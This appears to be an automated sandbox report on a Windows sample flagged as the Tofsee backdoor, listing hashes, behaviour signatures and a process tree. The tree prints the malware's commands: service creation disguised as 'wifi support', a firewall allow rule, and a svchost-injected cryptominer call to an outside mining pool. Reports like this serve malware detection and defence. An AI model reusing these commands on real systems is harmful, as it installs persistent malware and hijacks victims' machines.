Overview

overview

10

Static

static

d02ec1a9a9...d6.exe

windows7_x64

10

d02ec1a9a9...d6.exe

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-11-2020 17:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6.exe

  • Size

    13.6MB

  • MD5

    40a1b23d4eee202c6bee889f86515d3e

  • SHA1

    9aece8c7c889d9d96b8f16a20aa22ba6b43fa12c

  • SHA256

    d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6

  • SHA512

    e1901b58d92970834141237a79e1fc58930559651d80c022f6923f9fb2a99d07084447ba175d9bbf568c0070adac8d44e1b838bf8918d3b2df38d3609cfbac8d

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 19 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6.exe
    "C:\Users\Admin\AppData\Local\Temp\d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1400
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 552
      2⤵
      • Program crash
      PID:416
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 672
      2⤵
      • Program crash
      PID:2652
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 728
      2⤵
      • Program crash
      PID:208
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 760
      2⤵
      • Program crash
      PID:2956
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 800
      2⤵
      • Program crash
      PID:2732
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 840
      2⤵
      • Program crash
      PID:808
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 952
      2⤵
      • Program crash
      PID:3248
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ixvnraqy\
      2⤵
        PID:688
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 844
        2⤵
        • Program crash
        PID:720
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 732
        2⤵
        • Program crash
        PID:2064
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qhdkbaei.exe" C:\Windows\SysWOW64\ixvnraqy\
        2⤵
          PID:2756
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1000
          2⤵
          • Program crash
          PID:1572
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1064
          2⤵
          • Program crash
          PID:3948
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ixvnraqy binPath= "C:\Windows\SysWOW64\ixvnraqy\qhdkbaei.exe /d\"C:\Users\Admin\AppData\Local\Temp\d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3856
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 828
            2⤵
            • Program crash
            PID:640
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1064
            2⤵
            • Program crash
            PID:2792
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ixvnraqy "wifi internet conection"
            2⤵
              PID:2940
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 760
              2⤵
              • Program crash
              PID:1340
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 712
              2⤵
              • Program crash
              PID:3556
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ixvnraqy
              2⤵
                PID:1012
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1036
                2⤵
                • Program crash
                PID:476
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1000
                2⤵
                • Program crash
                PID:2188
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1456
              • C:\Windows\SysWOW64\ixvnraqy\qhdkbaei.exe
                C:\Windows\SysWOW64\ixvnraqy\qhdkbaei.exe /d"C:\Users\Admin\AppData\Local\Temp\d02ec1a9a978fb26895deffbb33df86266ba4730c81379e7a76cbeb15030add6.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1300
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 584
                  2⤵
                  • Program crash
                  PID:876
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:4044
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:60
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 640
                  2⤵
                  • Program crash
                  PID:68

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\qhdkbaei.exe
                MD5

                a4388a0dcec8c6e9e5f3594835f06e6a

                SHA1

                ed1378ab77b47b59df6d3e3285344153ef76c89f

                SHA256

                7ddfe32ed0f2ad77e3098c9f831e0c70ef9da1e6383d6e22d5bda47975799d6d

                SHA512

                bd5324178e023d6d56ec105d67e98b8ca90b4ba16fee895b10359b15b24df970b958bcc0254343e792bb4fbd9bd8058b96b9852be1ace01327cbc64f778dc1e9

                Download Submit

              • C:\Windows\SysWOW64\ixvnraqy\qhdkbaei.exe
                MD5

                a4388a0dcec8c6e9e5f3594835f06e6a

                SHA1

                ed1378ab77b47b59df6d3e3285344153ef76c89f

                SHA256

                7ddfe32ed0f2ad77e3098c9f831e0c70ef9da1e6383d6e22d5bda47975799d6d

                SHA512

                bd5324178e023d6d56ec105d67e98b8ca90b4ba16fee895b10359b15b24df970b958bcc0254343e792bb4fbd9bd8058b96b9852be1ace01327cbc64f778dc1e9

                Download Submit

              • memory/60-21-0x0000000002400000-0x00000000024F1000-memory.dmp

                Filesize

                964KB

                Download

              • memory/60-23-0x000000000249259C-mapping.dmp

                Download

              • memory/688-2-0x0000000000000000-mapping.dmp

                Download

              • memory/1012-7-0x0000000000000000-mapping.dmp

                Download

              • memory/1300-9-0x000000000248B000-0x000000000248C000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1300-10-0x0000000002770000-0x0000000002771000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1400-1-0x0000000002930000-0x0000000002931000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1400-0-0x0000000002461000-0x0000000002462000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1456-11-0x0000000000000000-mapping.dmp

                Download

              • memory/2756-3-0x0000000000000000-mapping.dmp

                Download

              • memory/2940-6-0x0000000000000000-mapping.dmp

                Download

              • memory/3856-5-0x0000000000000000-mapping.dmp

                Download

              • memory/4044-15-0x0000000004550000-0x000000000475F000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/4044-16-0x00000000029D0000-0x00000000029D6000-memory.dmp

                Filesize

                24KB

                Download

              • memory/4044-17-0x0000000003130000-0x0000000003140000-memory.dmp

                Filesize

                64KB

                Download

              • memory/4044-18-0x00000000031D0000-0x00000000031D5000-memory.dmp

                Filesize

                20KB

                Download

              • memory/4044-19-0x0000000008F90000-0x000000000939B000-memory.dmp

                Filesize

                4.0MB

                Download

              • memory/4044-20-0x00000000031E0000-0x00000000031E7000-memory.dmp

                Filesize

                28KB

                Download

              • memory/4044-13-0x0000000002689A6B-mapping.dmp

                Download

              • memory/4044-12-0x0000000002680000-0x0000000002695000-memory.dmp

                Filesize

                84KB

                Download